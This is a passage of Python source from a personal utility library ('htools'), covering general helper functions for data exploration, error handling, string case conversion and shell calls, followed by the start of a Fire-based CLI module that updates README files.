Can pass args to hdir to include magics or internals.
Returns
--------
dict[str, tuple]: Maps attribute name to a tuple of values, where the
first is the corresponding value for obj1 and the second is the
corresponding value for obj2.
"""
# May built-in comparison functionality. Keep error handling broad.
try:
if obj1 == obj2:
return {}
except Exception:
pass
attr1, attr2 = hdir(obj1, **kwargs), hdir(obj2, **kwargs)
assert attr1.keys() == attr2.keys(), 'Objects must have same attributes.'
diffs = {}
for (k1, v1), (k2, v2) in zip(attr1.items(), attr2.items()):
# Only compare non-callable attributes.
if not (methods or v1 == 'attribute'):
continue
# Comparisons work differently for arrays/tensors than other objects.
val1, val2 = getattr(obj1, k1), getattr(obj2, k2)
try:
equal = (val1 == val2).all()
except AttributeError:
equal = val1 == val2
# Store values that are different for obj1 and obj2.
if not equal:
diffs[k1] = (val1, val2)
return diffs
def catch(func, *args, verbose=False):
"""Error handling for list comprehensions. In practice, it's recommended
to use the higher-level robust_comp() function which uses catch() under the
hood.
Parameters
-----------
func: function
*args: any type
Arguments to be passed to func.
verbose: bool
If True, print the error message should one occur.
Returns
--------
any type: If the function executes successfully, its output is returned.
Otherwise, return None.
Examples
---------
[catch(lambda x: 1 / x, i) for i in range(3)]
>>> [None, 1.0, 0.5]
# Note that the filtering method shown below also removes zeros which is
# okay in this case.
list(filter(None, [catch(lambda x: 1 / x, i) for i in range(3)]))
>>> [1.0, 0.5]
"""
try:
return func(*args)
except Exception as e:
if verbose: print(e)
return
def safe_map(func, seq):
"""This addresses the issue of error handling in map() or list
comprehension operations by simply skipping any items that throw an error.
Note that values of None will be removed from the resulting list.
Parameters
----------
func: function
Function to apply to each item in seq.
seq: generator, iterator
The sequence to iterate over. This could also be a generator, list,
set, etc.
Returns
-------
list
Examples
--------
# Notice that instead of throwing an error when dividing by zero, that
# entry was simply dropped.
>>> safe_map(lambda x: x/(x-2), range(4))
[-0.0, -1.0, 3.0]
"""
return list(
filter(lambda x: x is not None, (catch(func, obj) for obj in seq))
)
def flatten(nested):
"""Flatten a nested sequence where the sub-items can be sequences or
primitives. This differs slightly from itertools chain methods because
those require all sub-items to be sequences. Here, items can be primitives,
sequences, nested sequences, or any combination of these. Any iterable
items aside from strings will be completely un-nested, so use with caution
(e.g. a torch Dataset would be unpacked into separate items for each
index). This also returns a list rather than a generator.
Parameters
----------
nested: sequence (list, tuple, set)
Sequence where some or all of the items are also sequences.
Returns
-------
list: Flattened version of `nested`.
"""
def _walk(nested):
for group in nested:
if isinstance(group, Iterable) and not isinstance(group, str):
yield from _walk(group)
else:
yield group
return list(_walk(nested))
class BasicPipeline:
"""Create a simple unidirectional pipeline of functions to apply in order
with optional debugging output.
"""
def __init__(self, *funcs):
"""
Parameters
----------
*funcs: function(s)
One or more functions to apply in the specified order.
"""
# Make `funcs` mutable. Could use @htools.meta.delegate('funcs')
# but not sure if that would cause circular import issues. Check later.
self.funcs = list(funcs)
def __call__(self, x, verbose=False, attr=''):
"""Apply the pipeline of functions to x.
Parameters
----------
x: any
Object to operate on.
verbose: bool
If True, print x (or an attribute of x) after each step.
attr: str
If specified and verbose is True, will print this attribute of x
after each function is applied.
Returns
-------
output of last func in self.funcs
"""
for func in self.funcs:
x = func(x)
if verbose: print(repr(getattr(x, attr, x)))
return x
def __repr__(self):
# Try to display each item in the form that was likely passed in: for
# functions, this is the name, but for callable classes this is
# the str representation of the object, not the class itself.
names = ',\n\t'.join(str(f) if hasattr(f, '__call__') else func_name(f)
for f in self.funcs)
return f'{type(self).__name__}(\n\t{names}\n)'
def pipe(x, *funcs, verbose=False, attr=''):
"""Convenience function to apply many functions in order to some object.
This lets us replace messy notation where it's hard to keep parenthesis
straight:
list(parse_processed_text(tokenize_rows(porter_stem(strip_html_tags(
text)))))
with:
pipe(text, strip_html_tags, porter_stem, tokenize_rows,
parse_processed_text, list)
or if we have a list of functions:
pipe(x, *funcs)
Parameters
----------
x: any
Object to apply functions to.
*funcs: function(s)
Functions in the order you want to apply them. Use functools.partial
to specify other arguments.
verbose: bool
If True, print x (or an attribute of x) after each step.
attr: str
If specified and verbose is True, will print this attribute of x
after each function is applied.
Returns
-------
output of last func in *funcs
"""
return BasicPipeline(*funcs)(x, verbose=verbose, attr=attr)
def vcounts(arr, normalize=True):
"""Equivalent of pandas_htools vcounts method that we can apply on lists
or arrays. Basically just a wrapper around Counter but with optional
normalization.
Parameters
----------
arr: Iterable
Sequence of values to count. Typically a list or numpy array.
normalize: bool
If True, counts will be converted to percentages.
Returns
-------
dict: Maps unique items in `arr` to the number of times (or % of times)
that they occur in `arr`.
"""
counts = dict(Counter(arr))
if normalize:
length = len(arr)
counts = {k: v/length for k, v in counts.items()}
return counts
def item(it, random=True, try_values=True):
"""Get an item from an iterable (e.g. dict, set, torch DataLoader).
This is a quick way to access an item for iterables that don't support
indexing, or do support indexing but require us to know a key.
Parameters
----------
it: Iterable
Container that we want to access a value from.
random: bool
If True, pick a random value from `it`. Otherwise just return the first
value.
try_values: bool
If True, will check if `it` has a `values` attribute and will operate
on that if it does. We often want to see a random value from a dict
rather than a key. If we want both a key and value, we could set
try_values=False and pass in d.items().
Returns
-------
any: An item from the iterable.
"""
if try_values and hasattr(it, 'values'): it = it.values()
if random: return choice(list(it))
return next(iter(it))
def lmap(fn, *args):
"""Basically a wrapper for `map` that returns a list rather than a
generator. This is such a common pattern that I think it deserves its own
function (think of it as a concise alternative to a list comprehension).
One slight difference is that we use *args instead of passing in an
iterable. This adds a slight convenience for the intended use case (fast
prototyping). See the `Examples` for more on this.
Parameters
----------
args: any
Returns
-------
list
Examples
--------
Consider these three equivalent syntax options:
lmap(fn, x, y)
[fn(obj) for obj in (x, y)]
list(map(fn, (x, y))
When quickly iterating, option 1 saves a bit of typing. The extra
parentheses that options 2 and 3 require to put x and y in a temporary
data structure can get messy as we add more complex logic.
"""
return list(map(fn, args))
def amap(attr, *args):
"""More convenient syntax for quick data exploration. Get an attribute
value for multiple objects. Name is short for "attrmap".
Parameters
----------
attr: str
Name of attribute to retrieve for each object.
args: any
Objects (usually of same type) to retrieve attributes for.
Returns
-------
list: Result for each object.
Examples
--------
df1 = pd.DataFrame(np.random.randint(0, 10, (4, 5)))
df2 = pd.DataFrame(np.random.randint(0, 3, (4, 5)))
df3 = pd.DataFrame(np.random.randint(0, 3, (2, 3)))
>>> amap('shape', df1, df2, df3)
[(4, 5), (4, 5), (2, 3)]
net = nn.Sequential(...)
>>> amap('shape', *net.parameters())
[torch.Size([5, 3]),
torch.Size([16, 4]),
torch.Size([16, 3]),
torch.Size([16])]
"""
return [getattr(arg, attr) for arg in args]
def smap(*x):
"""Get shape of each array/tensor in a list or tuple.
Parameters
----------
*x: np.arrays or torch.tensors
We use star unpacking here to create a consistent interface with amap()
and lmap().
Returns
-------
list: Shape of each array/tensor in input.
"""
return amap('shape', *x)
def sleepy_range(*args, wait=1, wait_before=True):
"""Convenience function: we often want to create a loop that mimics doing
some time intensive thing on each iteration. This is just like the built-in
range function (not technically a function!) but with a sleep period baked
in, making it particularly useful for list comprehensions where this would
be tricky otherwise. Note: unlike range, calling this is destructive.
See examples.
Parameters
----------
args: int
Passed on to range().
wait: int or float
Number of seconds to wait on each iteration. Remember this is a keyword
only argument for compatibility with the range interface.
wait_before: bool
Determines whether to sleep before or after yielding the number.
Defaults to before to mimic "doing work" before producing some result.
Examples
--------
# Takes 6 seconds to create this list.
>>> [i for i in sleepy_range(3, wait=2)]
[0, 1, 2]
>>> srange = sleepy_range(0, 6, 2, wait_before=False)
>>> for i in srange:
>>> print(i)
0
2
4
>>> for i in srange:
>>> print(i)
# Notice this cannot be used again without manually calling sleepy_range.
"""
for i in range(*args):
if wait_before: time.sleep(wait)
yield i
if not wait_before: time.sleep(wait)
def venumerate(iterable, start=0, freq=1, print_before=True,
message_format='{}'):
"""Verbose enumerate: simple convenience function that's a drop-in
replacement for enumerate. It prints updates as we iterate over some
object. TQDM progress bar may not be available in some cases (e.g. we
don't know the length of the interval, or possible some cases using
concurrency?), and this function gives us some way to keep an eye on
progress. Mainly intended as a convenience for list comprehensions, since
in a standard for loop we could easily add this logic.
Parameters
----------
iterable: Iterable
The object to iterate over.
start: int
Passed on to enumerate - the first index to use when counting.
freq: int
Frequency with which to print updates (i.e. updates are printed when
i is divisible by freq).
print_before: bool
Specifies whether to print the message before yielding the i'th value
or after.
message_format: str
Used to format the message that will be displayed when i is divisible
by freq. Defaults to just printing i.
"""
for i, x in enumerate(iterable, start=start):
if i % freq == 0 and print_before: print(message_format.format(i))
yield i, x
if i % freq == 0 and not print_before: print(message_format.format(i))
def method_of(meth):
"""Retrieve the class a method belongs to. This will NOT work on
attributes. Also, this won't help if your goal is to retrieve an instance:
this returns the type of the instance. Not thoroughly tested but it seems
to work regardless of whether you pass in meth from an instance or a class
(the output is the same in both cases).
Parameters
----------
meth: MethodType
The method to retrieve the class of.
Returns
-------
type: The class which defines the method in question.
Examples
--------
class Foo:
def my_method(self, x):
return x*2
f = Foo()
assert method_of(Foo.my_method) == method_of(f.my_method) == Foo
"""
cls, name = meth.__qualname__.split('.')
return dict(getmembers(getmodule(meth)))[cls]
def hasstatic(cls, meth_name):
"""Check if a class possesses a staticmethod of a given name. Similar to
hasattr. Note that isinstance(cls.meth_name, staticmethod) would always
return False: we must use getattr_static or cls.__dict__[meth_name]
to potentially return True.
Parameters
----------
cls: Type or any
A class or an instance (seems to work on both, though more extensive
testing may be needed for more complex scenarios).
meth_name: str
Name of method to check. If the class/instance does not contain any
attribute with this name, function returns False.
Returns
-------
bool: True if `cls` has a staticmethod with name `meth_name`.
"""
return isinstance(getattr_static(cls, meth_name, None), staticmethod)
def isstatic(meth):
"""Companion to hasstatic that checks a method itself rather than a class
and method name. It does use hasstatic under the hood.
"""
# First check isn't required but I want to avoid reaching the hackier bits
# of code if necessary. This catches regular methods and attributes.
if ismethod(meth) or not callable(meth): return False
parts = getattr(meth, '__qualname__', '').split('.')
if len(parts) != 2: return False
cls = method_of(meth)
return hasstatic(cls, parts[-1])
def has_classmethod(cls, meth_name):
"""Check if a class has a classmethod with a given name.
Note that isinstance(cls.meth_name, classmethod) would always
return False: we must use getattr_static or cls.__dict__[meth_name]
to potentially return True.
Parameters
----------
cls: type or obj
This is generally intended to be a class but it should work on objects
(class instances) as well.
meth_name: str
The name of the potential classmethod to check for.
Returns
-------
bool: True if cls possesses a classmethod with the specified name.
"""
return isinstance(getattr_static(cls, meth_name), classmethod)
def is_classmethod(meth):
"""Companion to has_classmethod that checks a method itself rather than a
class and a method name. It does use has_classmethod under the hood.
"""
if not ismethod(meth): return False
parts = getattr(meth, '__qualname__', '').split('.')
if len(parts) != 2: return False
cls = method_of(meth)
return has_classmethod(cls, parts[-1])
def parallelize(func, items, total=None, chunksize=1_000, processes=None):
"""Apply a function to a sequence of items in parallel. A progress bar
is included.
Parameters
----------
func: function
This will be applied to each item in `items`.
items: Iterable
Sequence of items to apply `func` to.
total: int or None
This defaults to the length of `items`. In the case that items is a
generator, this lets us pass in the length explicitly. This lets tdqm
know how quickly to advance our progress bar.
chunksize: int
Positive int that determines the size of chunks submitted to the
process pool as separate tasks. Multiprocessing's default is 1 but
larger values should speed things up, especially with long sequences.
processes: None
Optionally set number of processes to run in parallel.
Returns
-------
list
"""
total = total or len(items)
with Pool(processes) as p:
res = list(tqdm(p.imap(func, items, chunksize=chunksize),
total=total))
return res
def identity(x):
"""Returns the input argument. Sometimes it is convenient to have this if
we sometimes apply a function to an item: rather than defining a None
variable, sometimes setting it to a function, then checking if it's None
every time we're about to call it, we can set the default as identity and
safely call it without checking.
Parameters
----------
x: any
Returns
-------
x: Unchanged input.
"""
return x
def always_true(x, *args, **kwargs):
"""Similar to `identity` but returns True instead of x. I'm tempted to name
this `true` but I fear that will cause some horrible bugs where I
accidentally use this when I want to use True.
"""
return True
def ifnone(arg, backup):
"""Shortcut to provide a backup value if an argument is None. Commonly used
for numpy arrays since their truthiness is ambiguous.
Parameters
----------
arg: any
We will check if this is None.
backup: any
This will be returned if arg is None.
Returns
-------
Either `arg` or `backup` will be returned.
"""
return arg if arg is not None else backup
def listlike(x):
"""Checks if an object is a list/tuple/set/array etc. Strings and
mappings (e.g. dicts) are not considered list-like.
"""
return isinstance(x, Iterable) and not isinstance(x, (str, Mapping))
def tolist(x, length_like=None, length=None,
error_message='x length does not match desired length.'):
"""Helper to let a function accept a single value or a list of values for
a certain parameter.
WARNING: if x is a primitive and you specify a length (either via
`length_like` or `length`, the resulting list will contain multiple
references to the same item). This is mostly intended for use on lists of
floats or ints so I don't think it's a problem, but keep this in mind when
considering using this on mutable objects.
Parameters
----------
x: Iterable
Usually either a list/tuple or a primitive.
length_like: None or object
If provided, we check that x is the same length. If x is a primitive,
we'll make it the same length.
length: None or int
Similar to `length_like` but lets us specify the desired length
directly. `length_like` overrides this, though you should only provide
one or the other.
error_message: str
Displayed in the event that a desired length is specified and x is
list-like and does not match that length. You can pass in your own
error message if you want something more specific to your current use
case.
Returns
-------
list
Examples
--------
def train(lrs):
lrs = tolist(lrs)
...
We can now pass in a single learning rate or multiple.
>>> train(3e-3)
>>> train([3e-4, 3e-3])
"""
if length_like is not None: length = len(length_like)
# Case 1. List-like x
if listlike(x):
if length:
assert len(x) == length, error_message
return list(x)
# Case 2. Dict-like x
if isinstance(x, Mapping):
raise ValueError('x must not be a mapping. It should probably be a '
'primitive (str, int, etc.) or a list-like object '
'(tuple, list, set).')
# Case 3. Primitive x
return [x] * (length or 1)
def xor_none(*args, n=1):
"""Checks that exactly 1 (or n) of inputs is not None. Useful for
validating optional function arguments (for example, ensuring the user
specifies either a directory name or a list of files but not both.
Parameters
----------
args: any
n: int
The desired number of non-None elements. Usually 1 but we allow the
user to specify other values.
Returns
-------
None: This will raise an error if the condition is not satisfied. Do not
use this as an if condition (e.g. `if xor_none(a, b): print('success')`.
This would always evaluate to False because the function doesn't explicitly
return a value so we get None.
"""
if sum(bool(arg is not None) for arg in args) != n:
raise ValueError(f'Exactly {n} of args must be not None.')
def max_key(d, fn=identity):
"""Find the maximum value in a dictionary and return the associated key.
If we want to compare values using something other than their numeric
values, we can specify a function. For example, with a dict mapping strings
to strings, fn=len would return the key with the longest value.
Parameters
----------
d: dict
Values to select from.
fn: callable
Takes 1 argument (a single value from d.values()) and returns a number.
This will be used to sort the items.
Returns
-------
A key from dict `d`.
"""
return max(d.items(), key=lambda x: fn(x[1]))[0]
def is_builtin(x, drop_callables=True):
"""Check if an object is a Python built-in object.
Parameters
----------
x: object
drop_callables: bool
If True, return False for callables (basically functions, methods, or
classes). These typically will return True otherwise since they are of
class `type` or `builtin_function_or_method`.
Returns
-------
bool: True if `x` is a built-in object, False otherwise.
"""
def _builtin(x, drop_callables):
if callable(x) and drop_callables:
return False
return x.__class__.__module__ == 'builtins'
builtin = partial(_builtin, drop_callables=drop_callables)
# Check mapping first because mappings are iterable.
if isinstance(x, Mapping):
return builtin(x) and all(builtin(o) for o in flatten(x.items()))
elif isinstance(x, Iterable):
return builtin(x) and all(builtin(o) for o in flatten(x))
return builtin(x)
def hashable(x):
"""Check if an object is hashable. Hashable objects will usually be
immutable though this is not guaranteed.
Parameters
----------
x: object
The item to check for hashability.
Returns
-------
bool: True if `x` is hashable (suggesting immutability), False otherwise.
"""
try:
_ = hash(x)
return True
except TypeError:
return False
def fgrep(text, term, window=25, with_idx=False, reverse=False):
"""Search a string for a given term. If found, print it with some context.
Similar to `grep -C 1 term text`. `fgrep` is short for faux grep.
Parameters
----------
text: str
Text to search.
term: str
Term to look for in text.
window: int
Number of characters to display before and after the matching term.
with_idx: bool
If True, return index as well as string.
reverse: bool
If True, reverse search direction (find last match rather than first).
Returns
-------
str or tuple[int, str]: The desired term and its surrounding context.
If the term isn't present, an empty string is returned. If
with_idx=True, a tuple of (match index, string with text) is returned.
"""
idx = text.rfind(term) if reverse else text.find(term)
if idx == -1:
res = ''
else:
res = text[max(idx-window, 0):idx+window]
return (idx, res) if with_idx else res
def spacer(char='-', n_chars=79, newlines_before=1, newlines_after=1):
""" Get string to separate output when printing output for multiple items.
Parameters
----------
char: str
The character that will be printed repeatedly.
n_chars: int
The number of times to repeat `char`. We expect that `char` is a
single character so this will be the total line length.
newlines_before: int
Number of newline characters to add before the spacer.
newlines_after: int
Number of newline characters to add after the spacer.
Returns
-------
str
"""
return '\n'*newlines_before + char * n_chars + '\n'*newlines_after
def hr(char='-', n_chars=79, newlines_before=1, newlines_after=1):
"""Horizontal rule: print a line, usually to visually separate printed
outputs in a for loop. Same as spacer() but this includes the print call
instead of just returning a string. Basically, I want to keep spacer to
support old code that relies on it, but I wanted something a little
quicker/simpler than calling print(spacer()).
"""
print(
spacer(char, n_chars,
newlines_before=newlines_before, newlines_after=newlines_after)
)
def func_name(func):
"""Usually just returns the name of a function. The difference is this is
compatible with functools.partial, which otherwise makes __name__
inaccessible.
Parameters
----------
func: callable
Can be a function, partial, or callable class.
"""
assert callable(func), 'Input must be callable.'
try:
res = func.__name__
except AttributeError:
if isinstance(func, partial):
return func_name(func.func)
else:
return func.__class__.__name__
except Exception as e:
raise e
return res
def snake2camel(text):
"""Convert snake case to camel case. This assumes the input is valid snake
case (if you have some weird hybrid of snake and camel case, for instance,
you'd want to do some preprocessing first).
Parameters
----------
text: str
Snake case string, e.g. vader_sentiment_score.
Returns
-------
str: `text` converted to camel case, e.g. vaderSentimentScore.
"""
res = []
prev = ''
for char in text:
if char != '_':
# Check if res is empty because of case with leading underscore.
res.append(char.upper() if prev == '_' and res else char)
prev = char
return ''.join(res)
def camel2snake(text):
"""Convert camel case to snake case. This assumes the input is valid camel
case (if you have some weird hybrid of camel and snake case, for instance,
you'd want to do some preprocessing first).
Parameters
----------
text: str
Camel case string, e.g. vaderSentimentScore.
Returns
-------
str: `text` converted to snake case, e.g. vader_sentiment_score.
"""
res = []
for char in text:
if char.islower():
res.append(char)
else:
res.extend(['_', char.lower()])
return ''.join(res)
def to_snake(text):
"""Experimental feature: tries to convert any common format to snake case.
This hasn't been extensively tested but it seems to work with snake case
(no change), camel case, upper camel case, words separated by
hyphens/dashes/spaces, and combinations of the above. It may occasionally
split words that should not be split, though this should be rare if names
use actual English words (this might not work so well on fastai-style
variable names (very short, e.g. "tfms" for "transforms"), but the intended
use case is mostly for fixing column names in pandas.
Parameters
----------
text: str
Returns
-------
str: Input text converted to snake case.
"""
return '_'.join(wn.split(text.lower()))
def to_camel(text):
"""Experimental feature: tries to convert any common format to camel case.
This hasn't been extensively tested but it seems to work with camel case
(no change), snake case, upper camel case, words separated by
hyphens/dashes/spaces, and combinations of the above. It may occasionally
split words that should not be split, though this should be rare if names
use actual English words (this might not work so well on fastai-style
variable names (very short, e.g. "tfms" for "transforms"), but the intended
use case is mostly for fixing column names in pandas.
Parameters
----------
text: str
Returns
-------
str: Input text converted to snake case.
"""
return ''.join(w.title() if i > 0 else w
for i, w in enumerate(wn.split(text.lower())))
def kwargs_fallback(self, *args, assign=False, **kwargs):
"""Use inside a method that accepts **kwargs. Sometimes we want to use
an instance variable for some computation but want to give the user the
option to pass in a new value to the method (often ML hyperparameters) to
be used instead. This function makes that a little more convenient.
Parameters
----------
self: object
The class instance. In most cases users will literally pass `self` in.
args: str
One or more names of variables to use this procedure on.
assign: bool
If True, any user-provided kwargs will be used to update attributes of
the instance. If False (the default), they will be used in computation
but won't change the state of the instance.
kwargs: any
Just forward along the kwargs passed to the method.
Returns
-------
list or single object: If more than one arg is specified, a list of values
is returned. For just one arg, a single value will be returned.
Examples
--------
class Foo:
def __init__(self, a, b=3, c=('a', 'b', 'c')):
self.a, self.b, self.c = a, b, c
def walk(self, d, **kwargs):
a, c = kwargs_fallback(self, 'a', 'c', **kwargs)
print(self.a, self.b, self.c)
print(a, c, end='\n\n')
b, c = kwargs_fallback(self, 'b', 'c', assign=True, **kwargs)
print(self.a, self.b, self.c)
print(b, c)
# Notice the first `kwargs_fallback` call doesn't change attributes of f
# but the second does. In the first block of print statements, the variable
# `b` does not exist yet because we didn't include it in *args.
>>> f = Foo(1)
>>> f.walk(d=0, b=10, c=100)
1 3 ('a', 'b', 'c')
1 100
1 10 100
10 100
"""
res = []
for arg in args:
# Don't just use `kwargs.get(arg) or ...` because this doesn't work
# well when we pass in a numpy array or None.
val = kwargs[arg] if arg in kwargs else getattr(self, arg)
res.append(val)
if assign: setattr(self, arg, val)
return res if len(res) > 1 else res[0]
def cd_root(root_subdir='notebooks', max_depth=4):
"""Run at start of Jupyter notebook to enter project root.
Parameters
----------
root_subdir: str
Name of a subdirectory contained in the project root directory.
If not found in the current working directory, this will move
to the parent directory repeatedly until it is found. Choose carefully:
if you have multiple directories with the same name in your directory
structure (e.g. ~/htools/lib/htools), 'htools' would be a bad choice
if you want to end up in ~).
max_depth: int
Max number of directory levels to traverse. Don't want to get stuck in
an infinite loop if we make a mistake.
Examples
--------
Sample file structure (abbreviated):
my_project/
py/
fetch_raw_data.py
notebooks/
nb01_eda.ipynb
Running cd_root() from nb01_eda.ipynb will change the working
directory from notebooks/ to my_project/, which is typically the
same directory we'd run scripts in py/ from. This makes converting
from notebooks to scripts easier.
"""
changes = 0
start_dir = os.getcwd()
while root_subdir not in next(os.walk('.'))[1]:
if changes >= max_depth:
os.chdir(start_dir)
raise RuntimeError('Exceeded max_depth. Check that your '
'root_subdir is <= max_depth directories away.')
os.chdir('..')
changes += 1
print('Current directory:', os.getcwd())
def ngrams(word, n=3, step=1, drop_last=False):
"""To get non-overlapping sequences, pass in same value for `step` as `n`.
"""
stop = max(1, step+len(word)-n)
ngrams_ = []
for i in range(0, stop, step):
ngrams_.append(word[i:i+n])
if drop_last and len(ngrams_[-1]) < n: ngrams_ = ngrams_[:-1]
return ngrams_
def shell(cmd, return_output=True):
"""Execute shell command (between subprocess and os, there's ~5 different
ways to do this and I always forget which I want. This is just a way for me
to choose once and not have to decide again. There are rare situations
where we may need a different function (subprocess.run is blocking; if we
want to launch a process and continue the script without waiting for
completion, we can use subprocess.check_call).
Parameters
----------
cmd: str
Example: 'ls *.csv'
return_output: bool
If True, return the output of the command: e.g. if cmd is
'pip show requests', this would return a string containing information
about the version of the requests library you have installed. If False,
we return a tuple of (return code (0/1), stderr, stdout). I've noticed
the latter 2 are usually None though - need to read more into
subprocess docs to figure out why this is happening.
Returns
-------
tuple: returncode (int), stderr, stdout. I believe stderr and stdout are
None if nothing is returned and str otherwise.
"""
parts = cmd.split()
if return_output:
return check_output(parts).decode()
res = run(parts)
return res.returncode, res.stderr, res.stdout
def set_summary(x1, x2, info=('first_only', 'second_only')):
"""Summarize set comparison between two iterables (they will be converted
to sets internally).
Parameters
----------
info: Iterable[str]
Determines what info to return. 'first_only' returns items only in the
first iterable, 'second_only' returns items only in the second, 'and'
returns items in both, and 'or' returns items in either.
Returns
-------
dict[str, set]: Maps str in `info` to set of items.
"""
s1, s2 = set(x1), set(x2)
res = {'and': s1 & s2,
'or': s1 | s2,
'first_only': s1 - s2,
'second_only': s2 - s1}
for k, v in res.items():
print(f'{k}: {len(v)} items')
return select(res, keep=list(info))
def random_str(length, lower=False, valid=tuple(ascii_letters + '0123456789')):
"""Generate random string of alphanumeric characters.
Parameters
----------
length: int
Number of characters in output string.
lower: bool
If True, the output will be lowercased.
valid: Iterable
List-like container of valid characters (strings) to sample from.
Returns
-------
str: `length` characters long.
"""
text = ''.join(choices(valid, k=length))
return text.lower() if lower else text
def is_ipy_name(
name,
count_as_true=('In', 'Out', '_dh', '_ih', '_ii', '_iii', '_oh')
):
"""Check if a variable name looks like an ipython output cell, e.g.
"_49", "_", or "__".
More examples:
Returns True for names like (technically not sure if something like "__i3"
is actually used in ipython, but it looks like something we probably want
to remove in these contexts anyway /shrug):
['_', '__', '_i3', '__i3', '_4', '_9913', '__7', '__23874']
Returns False for names like
['_a', 'i22', '__0i', '_03z', '__99t']
and most "normal" variable names.
Parameters
----------
name: str
count_as_true: Iterable[str]
Additional variable names that don't necessarily fit the standard
pattern but should nonetheless return True if we encounter them.
Returns
-------
bool: True if it looks like an ipython output cell name, False otherwise.
"""
# First check if it fits the standard leading underscore format.
# Easier to handle the "only underscores" case separately because we want
# to limit the number of underscores for names like "_i3".
pat = '^_{1,2}i?\\d*$'
is_under = bool(re.match(pat, name)) or not name.strip('_')
return is_under or name in count_as_true
def varname(x, *skip, skip_ipy_names=True, strict=True):
"""Try to guess name of a variable.
Parameters
----------
x: any
Object we'd like to programmatically get the name of.
skip: str
Optionally provide one or more strings that we want to exclude from our
candidates. See Examples for a common use case.
skip_ipy_names: bool
Ignore names that look like the variable ipython uses to store cell
outputs, e.g. "_49", "_", "___".
strict: bool
If True and multiple candidate names are found (e.g. two variables
with the same integer value will have the same ID), raise an error.
If False, only warn when that happens and return a list of all matches.
Returns
-------
str
Examples
--------
# Notice we do have to tell the function to skip the name 'df' in this case
# because that variable temporarily points to the df of interest.
res = {}
for df in (train, val, test):
res[varname(df, 'df')] = process(df)
res.keys()
['train', 'val', 'test']
"""
skip = set(skip)
id_ = id(x)
matches = set(
k for k, v in globals().items() if id(v) == id_
and (not skip_ipy_names or not is_ipy_name(k))
)
matches = list(matches - skip)
n_matches = len(matches)
if strict and n_matches > 1:
raise RuntimeError(
f'Found {n_matches} matching names: {matches}. '
'Set strict=False to return a list of candidates in this scenario.'
)
elif n_matches > 1:
warnings.warn(f'Found {n_matches} matches: {matches}. '
'Returning all of them because strict=False.')
return matches
elif not matches:
raise RuntimeError(
f'Found zero matching variable names for input: {x}')
return matches[0]
SENTINEL = object()
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,153 | hdmamin/htools | refs/heads/master | /htools/cli.py | import ast
from datetime import datetime
import fire
from functools import wraps
import json
import pandas as pd
from pathlib import Path
import pkg_resources as pkg
from pkg_resources import DistributionNotFound
import pyperclip
import subprocess
import sys
import warnings
from htools.core import tolist, flatten, save
from htools.meta import get_module_docstring, in_standard_library, source_code
def Display(lines, out):
"""Monkeypatch Fire CLI to print "help" to stdout instead of using `less`
window. User never calls this with arguments so don't worry about them.
import fire
def main():
# do something
if __name__ == '__main__':
fire.core.Display = Display
fire.Fire(main)
"""
out.write('\n'.join(lines) + '\n')
fire.core.Display = Display
# Start of htools CLI below. Stuff above is to import when building new CLIs
# in other projects.
# TODO: adjust readme updater init so we can pass in lib-dirs and non-lib dirs
# separately. Ran into some annoying issues where setup.py in parent doesn't
# actually mean a dir is a package.
class ReadmeUpdater:
"""This is generally intended for a structure where each directory contains
either python scripts OR jupyter notebooks - I haven't tested it on
directories containing both. This is also not intended to work recursively:
we only try to update 1 readme file per directory.
"""
time_fmt = '%Y-%m-%d %H:%M:%S'
readme_id_start = '\n---\nStart of auto-generated file data.<br/>'
readme_id_end = '\n<br/>End of auto-generated file data. Do not add ' \
'anything below this.\n'
readme_regex = readme_id_start + '(.|\n)*' + readme_id_end
last_edited_cmd_fmt = 'git log -1 --pretty="format:%ct" {}'
def __init__(self, *dirs, default='_', detect_library=True):
"""
Parameters
----------
dirs: str
One or more paths (we recommend entering these relative to the
project root, where you should be running the command from, though
absolute paths should work too).
default: str
Used when a python file lacks a module-level docstring or a jupyter
notebook lacks a "# Summary" markdown cell near the top.
detect_library: bool
If True, we try to check if each directory is a python library. If
it is, the readme file will be placed in its parent rather than the
dir with all the python files. This is useful if you have py files
in `lib/my_library_name` but want to update the readme in `lib`.
Example
-------
updater = ReadmeUpdater('bin', 'lib/my_library_name', 'notebooks')
updater.update_dirs()
"""
self.dirs = [Path(d) for d in dirs]
self.extensions = {'.py', '.ipynb'}
self.default = default
self.detect_library = detect_library
def update_dirs(self, *dirs):
"""Update README files in the relevant directories.
Parameters
----------
dirs: str
If none are provided, this defaults to `self.dirs`. If you specify
values, this will process only those directories.
"""
for dir_ in dirs or self.dirs:
file_df = self._parse_dir_files(dir_)
if file_df.empty: continue
# In this first scenario, we check files in the specified path but
# update the readme of its parent. This is useful for a file
# structure like `lib/my_library_name`: we want to parse files from
# `lib/my_library_name` but update the readme in `lib`.
if self.detect_library and 'setup.py' in \
set(p.parts[-1] for p in dir_.parent.iterdir()):
readme_path = dir_.parent/'README.md'
else:
readme_path = dir_/'README.md'
self.update_readme(readme_path, file_df)
def _parse_dir_files(self, dir_):
"""Extract information (summary, modify time, size, etc.) from each
python script or ipy notebook in a directory.
Parameters
----------
dir_: Path
Directory to parse. The intention is this should either contain
notebooks OR python scripts since that's my convention - I'm not
sure if it will work otherwise.
Returns
-------
pd.DataFrame: 1 row for each relevant file. This works best with my
convention of naming files like "nb01_eda.ipynb" or
"s01_download_data.py" since results are sorted by name.
"""
files = []
for path in dir_.iterdir():
if path.suffix not in self.extensions: continue
stats = path.stat()
# Want py/ipy custom fields to come before change time/size in df.
files.append({
'File': path.parts[-1],
**self.parse_file(path),
'Last Modified': self.last_modified_date(path),
'Size': self.readable_file_size(stats.st_size)
})
# File numbering convention means these should be displayed in a
# logical order. Sort columns so name and summary are first.
df = pd.DataFrame(files)
if df.empty: return df
return df.sort_values('File').reset_index(drop=True)
def parse_file(self, path):
"""Wrapper to parse a python script or ipy notebook.
Parameters
----------
path
Returns
-------
dict: Should have key 'Summary' regardless of file type. Other keys
vary depending on whether the file is a script or notebook.
"""
return getattr(self, f'_parse_{path.suffix[1:]}')(path)
def update_readme(self, path, file_df):
